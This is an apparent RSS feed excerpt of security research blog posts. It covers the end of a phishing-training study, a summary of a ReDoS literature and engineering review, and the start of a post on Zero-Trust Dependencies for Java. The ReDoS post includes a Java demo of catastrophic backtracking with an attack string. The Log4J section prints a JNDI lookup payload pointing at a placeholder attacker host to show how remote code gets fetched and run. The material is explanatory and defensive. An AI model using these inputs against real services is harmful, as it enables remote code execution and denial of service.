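<p>To illustrate the first item: domain-level email authentication boils down to a few DNS TXT records, roughly like the following (the domain, selector, key, and mailbox are placeholders; consult your email provider’s documentation for real values):</p><pre>example.com.                      TXT  "v=spf1 include:_spf.example.com -all"
selector._domainkey.example.com.  TXT  "v=DKIM1; k=rsa; p=&lt;base64 public key&gt;"
_dmarc.example.com.               TXT  "v=DMARC1; p=quarantine; rua=mailto:dmarc-reports@example.com"</pre>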
<h4>From Punishment to Pragmatism</h4><p>One troubling trend in many organizations is the <strong>use of punitive responses</strong> to failed phishing simulations — mandatory punitive training, disciplinary actions, even public shaming. Our findings suggest this is not only unfair but <strong>counterproductive.</strong></p><p>Users aren’t the weak link; they’re the last line of defense in a chain that should have blocked the phish long before it reached their inbox. Blaming them for failures in that system does nothing to strengthen it.</p><h3>Where Do We Go From Here?</h3><p>Let’s be clear: this study doesn’t mean we should abandon training entirely. But it <em>does</em> mean we should:</p><ul><li><strong>Reframe awareness efforts</strong> as culture-building, not threat mitigation.</li><li><strong>Use the NIST Phish Scale</strong> to design better benchmarking for simulated campaigns.</li><li><strong>Focus compliance reporting</strong> on technical controls and layered defense rather than superficial training metrics.</li><li><strong>Reserve training</strong> for high-risk roles or post-incident remediation — not blanket deployment.</li></ul><p>It’s time we stop asking <em>“How do we make humans better at catching phish?”</em> and start asking: <strong>“Why are we still relying on them to do so much catching in the first place?”</strong></p><p>Thanks, Drew, for this great writeup. If you’d like to read the full piece, it’s available <a href="https://arxiv.org/pdf/2506.19899">here</a> and will appear at The Web Conference in 2026 (WWW’26).</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=5cb914c5c395" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[SoK: A Literature and Engineering Review of Regular Expression Denial of Service (ReDoS)]]></title>
            <link>https://davisjam.medium.com/sok-a-literature-and-engineering-review-of-regular-expression-denial-of-service-redos-e6b10ef547c7?source=rss-5917da729916------2</link>
            <guid isPermaLink="false">https://medium.com/p/e6b10ef547c7</guid>
            <category><![CDATA[research]]></category>
            <category><![CDATA[regex]]></category>
            <category><![CDATA[regular-expressions]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[software-development]]></category>
            <dc:creator><![CDATA[James Davis]]></dc:creator>
            <pubDate>Tue, 03 Jun 2025 19:49:08 GMT</pubDate>
            <atom:updated>2025-06-04T01:27:46.036Z</atom:updated>
            <content:encoded><![CDATA[<p>This blog post summarizes our recent work, “SoK: A Literature and Engineering Review of Regular Expression Denial of Service (ReDoS),” which appeared at the ACM ASIA Conference on Computer and Communications Security 2025 (ACM ASIACCS’25). This work was done in collaboration with Cris Staicu and his student Masud Bhuiyan at Germany’s CISPA Helmholtz Center for Information Security. This post was written by the co-lead author, my student <a href="https://berkcakar.dev">Berk Çakar</a>. You can find the preprint of the full paper <a href="https://arxiv.org/abs/2406.11618">here</a>.</p><h3>Background: Regexes and ReDoS</h3><p>Regular expressions are everywhere. They are used for input validation, search, and parsing; nearly every software system processes text. But what if a seemingly harmless regex in your codebase, or even one hidden away in an imported library, could be exploited by an attacker to bring your whole system down?</p><p>This threat is known as <strong>Regular Expression Denial of Service (ReDoS)</strong>, and was dignified by MITRE in 2021 as <a href="https://cwe.mitre.org/data/definitions/1333.html">CWE-1333</a> [1]. High-profile services have experienced outages due to CWE-1333: In 2016, Stack Overflow went dark for 34 minutes because of one regex [2]. The same issue happened to Cloudflare in 2019 for 27 minutes [3]. For JavaScript applications, some authors have found that ReDoS is the fourth most commonly reported server-side vulnerability [4].</p><p>The following figure from our paper shows the frequency of ReDoS CVEs by programming language package ecosystem (e.g. NPM/JS, PyPI/Python, etc.), with the OWASP Top-10 for comparison. ReDoS CVEs represent ~1% of CVEs on average across the ecosystems.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/962/1*AuIy_zt8Kbo-BionICzJKA.png" /><figcaption>Distribution of OWASP Top-10 and ReDoS CVEs per software package ecosystem, showing average prevalence per category. Data cover 2014–2023.</figcaption></figure><h4><strong>A Quick Regex Refresher: Why Can Regex Matching Become Tricky?</strong></h4><p>Simply put, regexes define textual patterns. The original “Kleene’s regexes” (<em>K-regexes</em>) had the basic building blocks of matching a sequence of characters (<em>/foo/</em>), matching a choice of two sequences (OR, <em>/foo|bar/</em>), and matching a repeated sequence (<em>/foo*/</em>). These can be processed very efficiently, with an optimal linear-time algorithm (the processing time grows proportionally to the length of the text you are checking).</p><p>But over time, regexes got empowered, with “Extended regexes” (<em>E-regexes</em>) adding complex features like backreferences (“match a previously-seen sequence”, <em>/foo(bar)\1/</em>) and lookarounds (check what’s before/after without consuming it, <em>/(?&lt;=foo)bar/</em> to match “bar” only if it is preceded by “foo”). These add expressive power but can complicate matching done under the hood. You might ask, why would anyone need such features? The answer is that regexes are a common element of a search API, and sometimes people want to search for surprisingly complex things. You put the two together, and regexes have gotten saddled with loads of features over the years.</p><h4><strong>What Is ReDoS?</strong></h4><p>Now, speaking of the “under the hood”, a system component called a <strong>regex engine</strong> is used to process regexes.
Regex engines typically implement one of two main approaches:</p><ul><li><strong>Thompson’s algorithm-based engines [5]:</strong> These strictly stick to formal automata theory and are fast with guaranteed linear-time performance. The trade-off is that they have limited support for complex E-regex features. RE2 and the Rust engine are notable examples.</li><li><strong>Spencer’s algorithm-based engines [6]:</strong> These use a technique called “backtracking”. Imagine the engine trying one path to match; if it fails, it “backtracks” to try another. At various points in time, Python, C# (.NET), JavaScript (V8), and Ruby have all used this algorithm.</li></ul><p>It is this second kind of engine that concerns us. The backtracking technique is really flexible, which makes it a great way to implement the E-regex features. It also raises a problem: that flexibility reduces the optimization potential, resulting in worse-than-linear match times on certain regexes and certain inputs.</p><p>CWE-1333 (whether triggered by an attacker or inadvertently, as in the case of Stack Overflow and Cloudflare) happens when a particular kind of input string reaches a vulnerable regex in the system and triggers “catastrophic backtracking” on the regex engine (we demonstrate this below). In this scenario the cost is asymmetric: the problematic input is small, but the server may still spend massive amounts of CPU time trying to match the regex, effectively denying service to legitimate users. That imbalance between the small cost for the attacker and the high cost for the server makes ReDoS an asymmetric threat [7].</p><p>For a ReDoS attack to work, three key ingredients are usually needed [8]:</p><ol><li><strong>A Backtracking Regex Engine:</strong> The system uses an engine that can suffer from catastrophic backtracking.</li><li><strong>A Vulnerable (Super-Linear) Regex:</strong> The application uses a regex pattern that is “problematically ambiguous” and can lead to super-linear (as discussed above) matching time.</li><li><strong>Attacker-Controlled Input:</strong> The attacker needs a way to craft and send the malicious string so it reaches and gets processed by that vulnerable regex.</li></ol>
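<p>If you want to see catastrophic backtracking for yourself, here is a small self-contained demo in Java, whose default regex engine is Spencer-style (the exact timings are machine-dependent, but the match time grows exponentially as the input grows):</p><pre>import java.util.regex.Pattern;

public class BacktrackDemo {
    public static void main(String[] args) {
        // (a+)+ is "problematically ambiguous": a run of n a's can be split
        // across the two quantifiers in exponentially many ways, and the
        // trailing '!' (which can never match) forces a backtracking engine
        // to try every split before reporting failure.
        Pattern vulnerable = Pattern.compile("(a+)+");
        for (int n = 16; n &lt;= 28; n += 2) {
            String attack = "a".repeat(n) + "!";
            long start = System.nanoTime();
            boolean matched = vulnerable.matcher(attack).matches();
            long ms = (System.nanoTime() - start) / 1_000_000;
            System.out.printf("n=%2d matched=%b time=%d ms%n", n, matched, ms);
        }
    }
}</pre><p>A Thompson-style engine such as RE2 answers the same queries in linear time, because it never re-examines an input position.</p>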
<p>For more on ReDoS, I recommend checking out this <a href="https://levelup.gitconnected.com/the-regular-expression-denial-of-service-redos-cheat-sheet-a78d0ed7d865">blog post</a> from my lab.</p><h3><strong>Why We Wrote This Paper</strong></h3><h4>The knowledge gap</h4><p>Although many research papers about ReDoS have been written over the years, nobody has asked: <em>What do we know about ReDoS, and what exactly matters to software practitioners?</em> We aimed to document what is known about ReDoS, the gaps, and where we should go next.</p><h4>The personal side</h4><p>This project was supervised by James C. Davis and Cris Staicu. Davis and Staicu led two of the major works on ReDoS in practice — Davis’s FSE’18 paper on “<a href="https://dl.acm.org/doi/pdf/10.1145/3236024.3236027">The Impact of ReDoS in Practice</a>” and Staicu’s USENIX’18 paper on “<a href="https://www.usenix.org/system/files/conference/usenixsecurity18/sec18-staicu.pdf">Freezing the Web</a>”. We ourselves built on prior work providing measurement tools, and since then we’ve seen dozens of follow-up works at top computing research venues. We’ve chatted at conferences about the state of the field, and finally decided we should write a review paper.</p><h3>Method and Results</h3><p>We proceeded down two prongs of research.</p><ul><li>First, we went over the existing academic research (i.e., the <strong>literature review</strong> part of the title), examining dozens of papers on how ReDoS is detected, prevented, and mitigated.</li><li>Second, we conducted an <strong>engineering review</strong>. We surveyed the latest regex engines in popular programming languages to see if and how ReDoS defenses have been implemented and how effective they are in practice. This is the part we think software engineers and developers would find especially interesting.</li></ul><h4><strong>What Do We Know About ReDoS? (The Literature Review)</strong></h4><p>In our paper, we systematically reviewed 35 academic papers focusing on ReDoS. The next figure shows the categories we identified.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/787/1*IEqKuj33OULn2ZyB_tJs8w.png" /><figcaption>Systematization of ReDoS research papers categorized into detection, prevention, mitigation, and related studies, with subcategories and key references. For reference numbers, see the paper bibliography.</figcaption></figure><p>Here is a brief overview of each category:</p><ul><li><strong>Spotting ReDoS (Detection): </strong><em>How do we find these vulnerable regexes? </em>Some authors use heuristics, others use formal automata. Others use dynamic detectors (e.g., fuzzing with runtime instrumentation) and ML models.</li><li><strong>Stopping ReDoS Before It Happens (Prevention): </strong><em>Can we design things to be ReDoS-proof? </em>Some authors have pursued better regex matching algorithms or optimizations such as memoization to avoid catastrophic backtracking. Others have developed tools to automatically rewrite vulnerable regexes into safer, equivalent ones.</li><li><strong>Shielding Against ReDoS (Mitigation): </strong><em>What if an attack gets through?</em> Some authors focus on anomaly detection, using ML or other techniques to spot when a regex is taking suspiciously long and then taking action. Others devise caps on how long regexes should be permitted to run, or how many backtracking steps can be taken (a sketch of a time-based cap follows this list).</li></ul>
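<p>To make the time-based variety concrete, here is a minimal Java sketch of an application-level cap (Java has no native regex timeout, so we wrap the match in a worker thread; the class and method names are ours):</p><pre>import java.util.Optional;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;
import java.util.regex.Pattern;

public class TimedMatch {
    private static final ExecutorService POOL = Executors.newCachedThreadPool();

    /** Returns the match result, or empty if the engine exceeded the time cap. */
    static Optional&lt;Boolean&gt; matches(Pattern p, String input, long timeoutMs) {
        Future&lt;Boolean&gt; task = POOL.submit(() -&gt; p.matcher(input).matches());
        try {
            return Optional.of(task.get(timeoutMs, TimeUnit.MILLISECONDS));
        } catch (TimeoutException e) {
            // Caveat: java.util.regex does not poll the interrupt flag, so the
            // worker may keep burning CPU; engine-level caps avoid this problem.
            task.cancel(true);
            return Optional.empty();
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }
}</pre>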
<p>During our review, we noticed that the academic community makes strong assumptions about ReDoS and attacker capabilities (e.g., assuming that attackers can send arbitrarily long inputs or always reach the vulnerable part of a regex), which may not always hold in practice due to common server-side protections like input validation &amp; length limits, rate limiting, and application firewalls. We also found that definitions of what counts as a “ReDoS vulnerability” vary widely. Some studies consider a one-second slowdown significant, while others require much longer. These inconsistencies make it difficult to assess the actual risk in practice.</p><h4><strong>What Are We Doing Against ReDoS? (The Engineering Review)</strong></h4><p>It is great that researchers are working on ReDoS, but have their ideas made it into the regex engines developers use? We reviewed the regex engines used in nine popular programming languages: JavaScript, Ruby, C#, Java, PHP, Perl, Python, Rust, and Go. We found that some language runtimes modernized their regex engines in recent years to address ReDoS concerns, some used Thompson-style engines from the start and so never gave ReDoS a chance, and some still use unoptimized Spencer-style engines that are vulnerable to ReDoS. The table below summarizes the current state of ReDoS defenses in these languages; a detailed description follows.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/914/1*iL7rYoIC4fO1uWVNUZ8WGg.png" /><figcaption>Summary of ReDoS defenses in the implementations of major programming languages.</figcaption></figure><ul><li><strong>JavaScript (Node.js — V8):</strong> Introduced an opt-in Thompson-style non-backtracking engine in 2021 for regexes that do not use E-regex features [9]. For those that do, the old Spencer-style backtracking engine is the only option. The change shipped in V8 v8.8, and Node.js has offered it as an experimental feature since v16.0.0. Engineering effort to implement this change was about 1558 lines of code (LOC), which is 10.6% of the original regex engine codebase.</li><li><strong>Ruby (MRI/CRuby):</strong> Adopted Davis et al.’s [8] <a href="https://bugs.ruby-lang.org/issues/19104">memoization scheme</a> for its Spencer-style backtracking engine for a defense that is on by default, and offers an optional <a href="https://bugs.ruby-lang.org/issues/17837">timeout mechanism</a> for E-regexes that can’t be memoized. Both features are available since Ruby 3.2 (2022) [10,11]. In total, both defenses took 1100 LOC to implement, corresponding to 4.7% of the original regex engine codebase.</li><li><strong>C# (.NET):</strong> Added an optional non-backtracking engine based on Brzozowski derivatives [12,13] in .NET 7 (2022) [14] and has also had an optional timeout feature since .NET 4.5 (2012) [15]. However, like Thompson-style engines, the non-backtracking engine does not support many E-regex features. The new non-backtracking engine is implemented in 5417 LOC, which is 34.7% of the original regex engine codebase.</li><li><strong>Java (OpenJDK):</strong> Introduced some <a href="https://github.com/openjdk/jdk/commit/b45ea89">bounded caching mechanisms</a> to its Spencer-style backtracking engine, which can help in certain ReDoS scenarios. This ReDoS defense has been available and enabled by default since Java 9 (2017). 1712 LOC were added to the original regex engine codebase (35.5% expansion) to implement this change.</li><li><strong>Rust and Go:</strong> These languages were designed with ReDoS safety in mind from the beginning, using Thompson-style engines that guarantee linear time matching. As a consequence, they do not support most of the E-regex features.</li><li><strong>PHP (Zend Engine), Perl (perl5), and Python (CPython):</strong> PHP, Perl, and Python also use Spencer-style backtracking regex engines and are likely vulnerable to ReDoS attacks. PHP [16] and Perl [17] have utilized “counter-based caps” (i.e., limits on the number of backtracking steps) for more than 20 years to prevent catastrophic backtracking, as an alternative to C# and Ruby’s “time-based caps” (i.e., timeouts).</li></ul><p>Lastly, Python has neither built-in engine optimizations against ReDoS vulnerabilities nor a native timeout-like mechanism for regex evaluations.</p><p>Now, it is great that engines are being updated, but how much safer are we? Or, conversely, how much more vulnerable are we if we use an engine that does not have ReDoS defenses?</p><p>To figure this out, we designed an experiment.
We grabbed a set of ~500K regexes collected from open-source software [18]. Using <a href="https://github.com/davisjam/vuln-regex-detector">vuln-regex-detector</a>, we identified regexes that were predicted to have exponential or polynomial worst-case behavior. For these candidates, we generated input strings designed to trigger ReDoS.</p><p>Then, we ran these regex-input pairs on two versions of the reviewed regex engines: an older version (before any major ReDoS fixes) and the latest version (with any new defenses turned on, even if they were not on by default). We timed how long the matches took and categorized them:</p><ul><li><strong>Exponential:</strong> The worst-case scenario. The processing time exceeds five seconds with fewer than 500 pumps of an attack string.</li><li><strong>High-Polynomial:</strong> Huge improvement but still pretty bad. The processing time exceeds five seconds with 500 or more pumps of an attack string.</li><li><strong>Low-Polynomial:</strong> Getting better… The processing time exceeds 0.5 seconds on an attack string but does not meet the exponential or high-polynomial criteria.</li><li><strong>Linear:</strong> Nice and speedy. The regex match never times out on the attack string.</li></ul><p>OK, how did it go?</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/823/1*FYrCjpu17WmNsQWBcvmOZw.png" /><figcaption>Performance of regex matching in old vs. latest engines.</figcaption></figure><p>The figure shows a substantial decrease in super-linear behavior in the engines that had implemented ReDoS defenses. Notably, exponential behavior is resolved in C# and JavaScript but persists in Ruby and Java, while polynomial behavior continues to manifest in JavaScript and Java. Therefore, the answer is yes! The defenses appear to be working effectively in addressing the common causes of super-linear behavior.</p><h3><strong>What Does It All Mean?</strong></h3><p>Our work is not only an academic exercise but also a call to action for developers and software engineers, and for researchers. Here are some key takeaways:</p><ol><li><strong>ReDoS is Contextual:</strong> A regex that is dangerous in one deployment can be harmless in another because engine versions, threading models, and resource limits differ. For example, a super-linear regex might be more serious in a single-threaded web application architecture like Node.js.</li><li><strong>Question the Threat Model:</strong> Much prior work assumes the adversary can send huge payloads or hit any input point without throttling. Production systems often enforce size caps, rate limits, or WAF filters. Before triaging a “vulnerable” regex, ask whether an external user can realistically reach it with a suitably long string.</li><li><strong>Expect Developer Pushback:</strong> Engineers sometimes label ReDoS reports as noise because few real outages have been traced to deliberate attacks, and some CVEs have been disputed. When filing bugs or reviewing reports, accompany them with a reproducible proof-of-concept under realistic circumstances; otherwise, the issue may be dismissed.</li><li><strong>Know Your Regex Engine:</strong> Understand the default behavior of the regex engine in your programming language and whether it offers safer modes or ReDoS-specific defenses. Are they on by default? Which regex APIs do you need to use to get the safest behavior? If you are using a Spencer-style regex engine, be more cautious.</li><li><strong>Look Beyond Regexes:</strong> Some parts of your program take longer than others to execute.
If an attacker can repeatedly reach these slow spots, the service can stall, much like in a ReDoS attack. While most denial-of-service cases still rely on big traffic spikes, attackers may switch to these “complexity” tricks. Regular profiling, removing needless loops, and adding timeouts on heavy work can save CPU cycles and leave attackers with less to exploit.</li></ol><h3><strong>Final Thoughts</strong></h3><p>Our exploration of ReDoS research and regex engine defenses shows a promising trend: awareness is growing, and solutions are emerging.</p><p>In fact, we think this is a clear success story for software engineering and cybersecurity research: researchers identified the problem, analyzed its causes, proposed solutions, and, in many cases, helped shape practical defenses now used in production systems.</p><p>However, the ReDoS threat continues. By understanding the nuances of ReDoS, knowing your tools, and thinking critically about exploitability, you can help bring ReDoS under control.</p><p>We hope our work provides a valuable map for researchers studying ReDoS as well as for software engineers on the front lines using regexes in their applications.</p><p>We thank the US National Science Foundation (NSF) for supporting this work through <a href="https://www.nsf.gov/awardsearch/showAward?AWD_ID=2135156&amp;HistoricalAwards=false">NSF-SaTC-2135156</a>.</p><h3><strong>References</strong></h3><p>[1] CWE-1333: Inefficient Regular Expression Complexity. <a href="https://cwe.mitre.org/data/definitions/1333.html">https://cwe.mitre.org/data/definitions/1333.html</a>.</p><p>[2] Stack Exchange Network Status. 2016. <em>Outage Postmortem — July 20, 2016</em>. <a href="https://stackstatus.tumblr.com/post/147710624694/outage-postmortem-july-20-2016">https://stackstatus.tumblr.com/post/147710624694/outage-postmortem-july-20-2016</a></p><p>[3] John Graham-Cumming. 2019. <em>Details of the Cloudflare outage on July 2, 2019</em>. <a href="https://blog.cloudflare.com/details-of-the-cloudflare-outage-on-july-2-2019">https://blog.cloudflare.com/details-of-the-cloudflare-outage-on-july-2-2019</a></p><p>[4] Masudul Hasan Masud Bhuiyan, Adithya Srinivas Parthasarathy, Nikos Vasilakis, Michael Pradel, and Cristian-Alexandru Staicu. 2023. <em>SecBench.js: An Executable Security Benchmark Suite for Server-Side JavaScript</em>. In Proceedings of the 45th International Conference on Software Engineering (Melbourne, Victoria, Australia) (ICSE ’23). IEEE Press, 1059–1070. doi:10.1109/ICSE48619.2023.00096</p><p>[5] Ken Thompson. 1968. <em>Programming Techniques: Regular expression search algorithm</em>. Commun. ACM 11, 6 (June 1968), 419–422. doi:10.1145/363347.363387</p><p>[6] Henry Spencer. 1994. <em>A Regular-Expression Matcher</em>. In Software Solutions in C. Academic Press Professional, Inc., USA, 35–71</p><p>[7] Georgios Mantas, Natalia Stakhanova, Hugo Gonzalez, Hossein Hadian Jazi, and Ali A. Ghorbani. 2015. <em>Application-layer denial of service attacks: taxonomy and survey</em>. International Journal of Information and Computer Security 7, 2/3/4 (Nov. 2015), 216–239. doi:10.1504/IJICS.2015.073028</p><p>[8] James C. Davis, Francisco Servant, and Dongyoon Lee. 2021. <em>Using Selective Memoization to Defeat Regular Expression Denial of Service (ReDoS)</em>. In 2021 IEEE Symposium on Security and Privacy (SP). IEEE, 1–17. doi:10.1109/SP40001.2021.00032</p><p>[9] Martin Bidlingmaier. 2021. <em>An Additional Non-Backtracking RegExp Engine</em>.
<a href="https://v8.dev/blog/non-backtracking-regexp">https://v8.dev/blog/non-backtracking-regexp</a></p><p>[10] Yui Naruse. 2022. <em>Ruby 3.2.0 Released</em>. <a href="https://www.ruby-lang.org/en/news/2022/12/25/ruby-3-2-0-released/">https://www.ruby-lang.org/en/news/2022/12/25/ruby-3-2-0-released/</a>.</p><p>[11] Victor Shepelev. 2023. <em>Ruby 3.2 Changes</em>. <a href="https://rubyreferences.github.io/rubychanges/3.2.html#regexp-redos-vulnerability-prevention">https://rubyreferences.github.io/rubychanges/3.2.html#regexp-redos-vulnerability-prevention</a>.</p><p>[12] Dan Moseley, Mario Nishio, Jose Perez Rodriguez, Olli Saarikivi, Stephen Toub, Margus Veanes, Tiki Wan, and Eric Xu. 2023. <em>Derivative Based Nonbacktracking Real-World Regex Matching with Backtracking Semantics</em>. Proc. ACM Program. Lang. 7, PLDI, Article 148 (June 2023), 24 pages. doi:10.1145/3591262</p><p>[13] Olli Saarikivi, Margus Veanes, Tiki Wan, and Eric Xu. 2019. <em>Symbolic Regex Matcher</em>. In Tools and Algorithms for the Construction and Analysis of Systems, Tomás Vojnar and Lijun Zhang (Eds.). Springer International Publishing, Cham, 372–378. doi:10.1007/978–3–030–17462–0_24</p><p>[14] Stephen Toub. 2022. <em>Regular Expression Improvements in .NET 7</em>. <a href="http://devblogs.microsoft.com/dotnet/regular-expression-improvements-in-dotnet-7">http://devblogs.microsoft.com/dotnet/regular-expression-improvements-in-dotnet-7</a>.</p><p>[15] NET Contributors. 2023. <em>What’s New in NET Framework</em>. <a href="https://learn.microsoft.com/en-us/dotnet/framework/whats-new/#whats-new-in-net-framework-45">https://learn.microsoft.com/en-us/dotnet/framework/whats-new/#whats-new-in-net-framework-45</a>.</p><p>[16] PHP Documentation Group. 2024. <em>PHP: Runtime Configuration Manual</em>. <a href="https://www.php.net/manual/en/pcre.configuration.php">https://www.php.net/manual/en/pcre.configuration.php</a>.</p><p>[17] Joerg Ludwig. 2009. <em>Complex regular subexpression recursion limit</em>. <a href="https://www.perlmonks.org/?node_id=810857">https://www.perlmonks.org/?node_id=810857</a>.</p><p>[18] James C. Davis, Louis G. Michael IV, Christy A. Coghlan, Francisco Servant, and Dongyoon Lee. 2019. <em>Why aren’t regular expressions a lingua franca? an empirical study on the re-use and portability of regular expressions</em>. In Proceedings of the 2019 27th ACM Joint Meeting on European Software Engineering Conference and Symposium on the Foundations of Software Engineering (Tallinn, Estonia) (ESEC/FSE 2019). Association for Computing Machinery, New York, NY, USA, 443–454. doi:10.1145/3338906.3338909</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=e6b10ef547c7" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Mitigating Software Supply Chain Vulnerabilities with Zero-Trust Dependencies]]></title>
            <link>https://davisjam.medium.com/mitigating-software-supply-chain-vulnerabilities-with-zero-trust-dependencies-06f950497cfe?source=rss-5917da729916------2</link>
            <guid isPermaLink="false">https://medium.com/p/06f950497cfe</guid>
            <category><![CDATA[software-engineering]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[software-development]]></category>
            <category><![CDATA[software]]></category>
            <category><![CDATA[security]]></category>
            <dc:creator><![CDATA[James Davis]]></dc:creator>
            <pubDate>Wed, 07 May 2025 15:45:14 GMT</pubDate>
            <atom:updated>2025-05-07T15:57:08.105Z</atom:updated>
            <content:encoded><![CDATA[<p>This is a brief for the research paper “ZTDJava: Mitigating Software Supply Chain Vulnerabilities with Zero-Trust Dependencies”, published at the IEEE/ACM 2025 International Conference on Software Engineering (ICSE). This work was led by Paschal Amusuo, one of my research assistants. The full paper is available <a href="https://www.computer.org/csdl/proceedings-article/icse/2025/056900a685/251mGJgJbuo">here</a> (open-access preprint <a href="https://arxiv.org/pdf/2310.14117">here</a>). Paschal wrote this brief, which I have lightly edited. This paper is part of my lab’s body of work on the software supply chain — I put some links at the bottom if you want to read more.</p><h3>Summary</h3><p>This paper introduces Zero-Trust Dependencies (ZTD), a novel concept where dependencies in an application are untrusted and require explicit policy authorization to access system resources. ZTD is distinguished from prior sandboxing work by its support for dependency management and its simple, data-driven policies. We measure its feasibility, provide a system design and a prototype to enable adoption, and evaluate its effectiveness and cost in preventing software supply chain vulnerabilities.</p><h3>Background</h3><h4><strong>The Log4J Incident Taught Us Not To Trust Our Dependencies</strong></h4><p>Remember the Log4J vulnerability of 2021? A vulnerability in a simple logging library caused a global crisis. Attackers could exploit the vulnerability and execute malicious code within your application.</p><p>But first, what happened? The Log4J library had a feature, Java Naming and Directory Interface (JNDI), that allowed it to find and fetch data from external servers using just a naming identifier [1]. If the fetched data is a serialized Java object, arbitrary code execution can occur when the object is deserialized. Hence, if an attacker could control what Log4J logged (e.g. if an application uses Log4J to log fields from user forms or HTTP headers), the attacker could direct Log4J to fetch and execute malicious code on the server the application runs on.</p>
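<p>To make the attack concrete, here is a minimal sketch (the handler is hypothetical and the attacker URL is a placeholder; the payload shape is the widely reported one):</p><pre>import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class GreetingHandler {
    private static final Logger LOG = LogManager.getLogger(GreetingHandler.class);

    /* Hypothetical handler: userAgent comes straight from an HTTP header. */
    void handle(String userAgent) {
        // If the attacker sets their User-Agent header to:
        //   ${jndi:ldap://attacker.example/a}
        // an affected Log4J version resolves the JNDI lookup, fetches a
        // serialized object from the attacker's server, and executes it.
        LOG.info("Request from user agent: {}", userAgent);
    }
}</pre>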
<p>In the wake of this incident, organizations were forced to scramble for fixes, work nights and weekends, or even shut down their applications to avoid exploitation until the vulnerability was patched. Online sources even estimate that the average cost of the Log4J incident response was over $90,000 [2].</p><p>This incident highlighted a critical flaw in how we think about dependencies. Essentially, the question arose: <em>Can we truly trust every library we use?</em> The answer, unfortunately, turned out to be no.</p><h4><strong>Understanding the Software Supply Chain Risk</strong></h4><p>Modern software development relies heavily on third-party libraries, our “dependencies.” The use of dependencies makes software development faster and easier, but dependencies also introduce risk. We often treat them as black boxes, using their functionality but rarely understanding their internal workings or monitoring how they change over time. These dependencies are a part of our software supply chain, and any vulnerability within any dependency can become a vulnerability in our entire application if user-controlled input from the application reaches the vulnerable code.</p><p>A vulnerability is any bug or feature of an application that an attacker can exploit. We refer to vulnerabilities that occur in libraries and other dependencies as <em>Software Supply Chain (SSC) Vulnerabilities</em>. These vulnerabilities are especially dangerous because dependencies are typically trusted by the application that uses them. They execute with the full permissions granted to the application.</p><p>The following figure shows the structure of modern software applications. All applications (big yellow box) interact with an operating system that provides access to sensitive resources such as the file system, the network, and the ability to execute code. Within the application, there is application logic (“business logic”) and third-party code. This figure is not actually to scale — many reports, e.g. from Sonatype, state that third-party code dominates, comprising 80%-90% of many software applications!</p><p>There are two crucial elements of this figure from our perspective. First, those third-party dependencies run within the box labeled “Application” — from the perspective of the operating system, code within the application all has the same privileges. Second, these dependencies may have vulnerabilities, introduced either maliciously (red box) or accidentally (beige box, like Log4J was).</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*binP8IPsAnvtRIRcaNQg7A.png" /><figcaption>Model of modern software. Applications are composed of in-house and third-party code. To run securely, engineers should not trust third-party code. At present their options for doing so are lackluster.</figcaption></figure><h3><strong>Proposal: Zero-Trust Dependencies (ZTD)</strong></h3><h4>The ZTD concept</h4><p><em>What if, instead of trusting dependencies by default, we consider all dependencies as untrusted and only permit resource access if a dependency has explicit authorization?</em></p><p>We refer to this paradigm as Zero-Trust Dependencies (ZTD). Our ZTD concept is based on the Zero-Trust Architecture (ZTA) for computer networks, which the United States NIST recommends and which has been adopted by major technology organizations like Google [3] and Microsoft [4].</p><p>The Zero-Trust Architecture requires secure access to the resources in a system, and that users or devices in that system are only granted the least privileges they need. We took this mindset and applied it to the application runtime. In this context, the ZTD paradigm requires:</p><ol><li><em>Secure and Context-based Resource Access</em>: Every access to a resource should be authorized in consideration of its context.</li><li><em>Least-Privilege Policy Enforcement</em>: Access policies should grant minimum access rights to subjects (software dependencies).</li><li><em>Continuous Monitoring</em>: Organizations should monitor the state and activities of the subjects (software dependencies) and use the insights gained to improve the creation and enforcement of policies.</li></ol><p>In other words, dependencies should be considered untrusted by default, dependencies that need resource access should have explicit authorization, and dependencies should only have the least set of privileges that they need.</p><p>In any security system, there is always a fourth requirement: that the costs of security not outweigh the benefits. In this case, the costs of enforcing ZTD at runtime must not make the resulting computing system unusable.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/693/0*wcIXoVYQ6861h0dE" /><figcaption>The Zero-Trust Dependencies (ZTD) concept.
To mitigate attacks exploiting vulnerable dependencies, a ZTD system provides secure access via runtime authorization, makes authorization decisions using a least-privileges access policy, and facilitates continuous monitoring of unexpected accesses.</figcaption></figure><h4>Isn’t this yet another take on sandboxing?</h4><p>Secure access control and least privilege enforcement are not new topics in software engineering. There are many technologies, like Docker containers [5] and application security managers [6], that can provide secure resource access control and allow the enforcement of least privileges on an application. However, our analysis suggests that prior approaches fail to satisfy all of these requirements.</p><p>ZTD is not the first proposal to address dependency vulnerabilities. Let me share a bit more detail on how ZTD differs from prior works.</p><ul><li>Solutions like MIR [7] control which functions a dependency can call, while others like BreakApp [8] isolate dependencies in containers. However, these solutions either do not address dependency vulnerabilities, or their protection comes at substantial performance cost. The first targets only maliciously injected code, and the second incurs heavy performance overhead, making it impractical for isolating all dependencies.</li><li>Application-level sandboxing solutions like the Java Security Manager (JSM) [6] can conceptually address dependency vulnerabilities, as they allow application engineers to grant access permissions to individual classes in the application. However, application engineers do not know the class names in their dependencies, and specifying class-level policies would require substantial effort. These factors made the JSM hard to configure, increased its performance overhead, and ultimately led to its deprecation.</li></ul><p>In contrast, ZTD tackles accidental vulnerabilities like Log4J with minimal overhead by operating at the resource-access level, inspecting what resources a dependency tries to access during a dangerous operation, and only allowing the operation based on the dependency’s permission. This allows for more fine-grained and efficient control.</p><p>The following table is taken from the paper (so the references are to the paper’s 